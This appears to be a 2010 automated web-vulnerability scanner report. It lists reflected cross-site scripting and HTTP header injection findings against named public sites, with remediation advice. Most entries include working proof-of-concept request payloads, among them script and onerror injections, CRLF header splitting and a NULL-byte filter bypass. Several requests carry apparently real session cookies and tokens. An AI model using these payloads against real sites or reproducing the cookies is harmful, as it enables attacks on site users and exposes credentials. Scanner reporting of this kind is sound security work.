HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 1 is copied into the Location response header. The payload 1ec36%0d%0aee4caf17b88 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1ec36%0d%0aee4caf17b88/N4390.no_url_specifiedOX2495/B4882317.27 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1ec36 ee4caf17b88/N4390.no_url_specifiedOX2495/B4882317.27: Date: Sat, 11 Dec 2010 17:58:38 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 71417%0d%0a24e536cd9bc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /71417%0d%0a24e536cd9bc/N5811.6393.MYSPACE/B5015899;sz=300x250;click=http://demr.opt.fimserve.com/lnk/?ek=ACG08K6QAu-50ciAUFyu_g1vWRK6xCufeZRioGttipdpYIHhIo1Tmf-eAjPrq7qr8WSGmgZemaJVJcp1KTVV_GnIwIO3mcXAJHjXkvmqllx0JS5NB2zFE5u-R3oFsOsuu4gJ75KaWoQNK-CXPm2PoM7PcWgcny9V1viFVFjcJOjXnHwyusqsueyd0b3CHolEGMBY1V5Qn-rDwX4Z22CB5u1F7t9VUi55J1JTxHBTOb19yLgi32VSspuMsiu6GLXSFiFdBXWfllZ6v6Kl6uLimt6xLBZZR59aJJzQxuAO1qoIpa1OD3L6R1PDXzRcLE0Cpghref=;ord=1292087967885? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=19000011&pos=mrec&rnd=963501277&nwvert=2010 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5b51"><script>alert(1)</script>7a67c21e36c was submitted in the REST URL parameter 1. This input was echoed as b5b51"><script>alert(1)</script>7a67c21e36c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%00b5b51"><script>alert(1)</script>7a67c21e36c/2006/03/base/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 18:03:44 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1789 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00bbe77<a>2359e70d7a6 was submitted in the REST URL parameter 1. This input was echoed as bbe77<a>2359e70d7a6 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%00bbe77<a>2359e70d7a6/2006/03/base/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 18:03:45 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1643 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 566c2<a>e6fcc6b2e57 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2006/03/base566c2<a>e6fcc6b2e57/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 18:04:23 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php Expires: Sat, 11 Dec 2010 18:04:23 GMT Last-Modified: Sat, 11 Dec 2010 18:04:23 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1351 Connection: close Content-Type: text/html; charset=UTF-8
2.4. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dean.edwards.name
Path:
/weblog/2006/03/base/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a146b"><script>alert(1)</script>c78c2ed554b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a146b\"><script>alert(1)</script>c78c2ed554b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /weblog/2006/03/base/?a146b"><script>alert(1)</script>c78c2ed554b=1 HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008d248"><script>alert(1)</script>a888f0f5543 was submitted in the REST URL parameter 1. This input was echoed as 8d248"><script>alert(1)</script>a888f0f5543 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%008d248"><script>alert(1)</script>a888f0f5543 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the exp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e996f"-alert(1)-"57ce3775cd6 was submitted in the exp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /annual2010/public/MainHall.aspx?ID=5938&sortMenu=101000&exp=12%2f22%2f2009+1%3a28%3a47+PMe996f"-alert(1)-"57ce3775cd6 HTTP/1.1 Host: events.nrf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 11 Dec 2010 18:07:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=b1hztn55j3hxyw454pesxjve; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 30636
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html> <head> <meta name="description" content="Join us in New York to be inspired, network with your colleagues, and discover n ...[SNIP]... the full path from the qurystring. strFullPath="/annual2010/public/MainHall.aspx";
//Get only querystring strQryValus="ID=5938&sortMenu=101000&exp=12%2f22%2f2009+1%3a28%3a47+PMe996f"-alert(1)-"57ce3775cd6"; arrstrFullPath=strFullPath.split("/");
//Commented By Tulsi on 170062005 //strfileName=arrstrFullPath[5]; //Added By Tulsi on 170062005 fro 5 - arrstrFullPath.length-1 ...[SNIP]...
2.7. http://events.nrf.com/annual2010/public/MainHall.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.nrf.com
Path:
/annual2010/public/MainHall.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79b66"-alert(1)-"e35552360be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /annual2010/public/MainHall.aspx?79b66"-alert(1)-"e35552360be=1 HTTP/1.1 Host: events.nrf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 11 Dec 2010 17:59:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=iuh00mfdl5xuqg452jimav45; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 30444
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html> <head> <meta name="description" content="Join us in New York to be inspired, network with your colleagues, and discover n ...[SNIP]... r strLang1=""; var strLang2="";
//Get the full path from the qurystring. strFullPath="/annual2010/public/MainHall.aspx";
//Get only querystring strQryValus="79b66"-alert(1)-"e35552360be=1"; arrstrFullPath=strFullPath.split("/");
//Commented By Tulsi on 170062005 //strfileName=arrstrFullPath[5]; //Added By Tulsi on 170062005 fro 5 - arrstrFullPath.length ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ed32<img%20src%3da%20onerror%3dalert(1)>d81d4c9e66 was submitted in the REST URL parameter 1. This input was echoed as 3ed32<img src=a onerror=alert(1)>d81d4c9e66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /ec0605lb3ed32<img%20src%3da%20onerror%3dalert(1)>d81d4c9e66/eventcenter/recording/recordAction.do HTTP/1.1 Host: googleonline.webex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request Date: Sat, 11 Dec 2010 18:00:23 GMT Server: Apache Content-Length: 114 Set-Cookie: JSESSIONID=bMqHND8XhR6xdC4Z7g07qXWGR9RbyzJNtDmDxyygJDBvrZX2yQKb!-2086176403; path=/ Connection: close Content-Type: text/html
Invalid path /ec0605lb3ed32<img src=a onerror=alert(1)>d81d4c9e66/eventcenter/recording/recordAction was requested
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9d92c<img%20src%3da%20onerror%3dalert(1)>b4c765c70c9 was submitted in the REST URL parameter 2. This input was echoed as 9d92c<img src=a onerror=alert(1)>b4c765c70c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /ec0605lb/eventcenter9d92c<img%20src%3da%20onerror%3dalert(1)>b4c765c70c9/recording/recordAction.do HTTP/1.1 Host: googleonline.webex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request Date: Sat, 11 Dec 2010 18:00:27 GMT Server: Apache Content-Length: 106 Set-Cookie: JSESSIONID=L6BFND8bBTYMxXwwjl1kCft6FRJKL9qcdq6VlGt8nTDF4DP39wf6!1267178989; path=/ P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Connection: close Content-Type: text/html
Invalid path /eventcenter9d92c<img src=a onerror=alert(1)>b4c765c70c9/recording/recordAction was requested
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3e04b<img%20src%3da%20onerror%3dalert(1)>edd90b20f19 was submitted in the REST URL parameter 3. This input was echoed as 3e04b<img src=a onerror=alert(1)>edd90b20f19 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /ec0605lb/eventcenter/recording3e04b<img%20src%3da%20onerror%3dalert(1)>edd90b20f19/recordAction.do HTTP/1.1 Host: googleonline.webex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request Date: Sat, 11 Dec 2010 18:00:30 GMT Server: Apache Content-Length: 106 Set-Cookie: JSESSIONID=10vZND8pxx1kb88rC5wnwyXY12p8SVCYpyYQVGlrlvwg1t74CmgJ!1267178989; path=/ P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Connection: close Content-Type: text/html
Invalid path /eventcenter/recording3e04b<img src=a onerror=alert(1)>edd90b20f19/recordAction was requested
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e9802<script>alert(1)</script>e9157f8b18e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /oauth/authorizee9802<script>alert(1)</script>e9157f8b18e?client_id=8744a0ccdce1491c4474dacf75dc2d12&redirect_uri=http://www.myspace.com/fbocallback&scope=email,offline_access,user_about_me,user_birthday,user_likes,publish_stream&display=popup HTTP/1.1 Host: graph.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request Cache-Control: no-store Content-Type: text/javascript; charset=UTF-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache WWW-Authenticate: OAuth "Facebook Platform" "invalid_request" "Unknown OAuth 2.0 method, authorizee9802<script>alert(1)</script>e9157f8b18e." Set-Cookie: datr=QbcDTSBbj9Vvh3G0O-kWlzIe; expires=Mon, 10-Dec-2012 17:39:13 GMT; path=/; domain=.facebook.com; httponly Connection: close Date: Sat, 11 Dec 2010 17:39:13 GMT Content-Length: 151
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73a62"%3balert(1)//831b24e6265 was submitted in the REST URL parameter 2. This input was echoed as 73a62";alert(1)//831b24e6265 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wiki/Fusing_Enterprise_Search_and_Social_Bookmarking73a62"%3balert(1)//831b24e6265 HTTP/1.1 Host: mike2.openmethodology.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 18:13:19 GMT Server: Apache/2.2.17 (Unix) X-Powered-By: PHP/5.2.14 Pragma: no-cache Content-language: en Vary: Accept-Encoding,Cookie Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: private, must-revalidate, max-age=0 Set-Cookie: openmeth_omwikidb_omw__session=o23sch2m9uit36jtq3cp8c5ho7; path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31207
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
...[SNIP]... <script type="text/javascript">a2a_linkname="Fusing Enterprise Search and Social Bookmarking73a62";alert(1)//831b24e6265";a2a_linkurl="http://mike2.openmethodology.org/wiki/Fusing_Enterprise_Search_and_Social_Bookmarking73a62%22;alert(1)//831b24e6265"; a2a_onclick=1;</script> ...[SNIP]...
2.13. http://msdn.microsoft.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://msdn.microsoft.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6d48"><a>3d147823d73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?f6d48"><a>3d147823d73=1 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 25588 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:16:37 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/ms348103.aspx?f6d48"><a>3d147823d73=1" /> ...[SNIP]...
2.14. http://msdn.microsoft.com/cc300389.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://msdn.microsoft.com
Path:
/cc300389.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5db99"><a>00ccaba71ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cc300389.aspx?5db99"><a>00ccaba71ba=1 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response
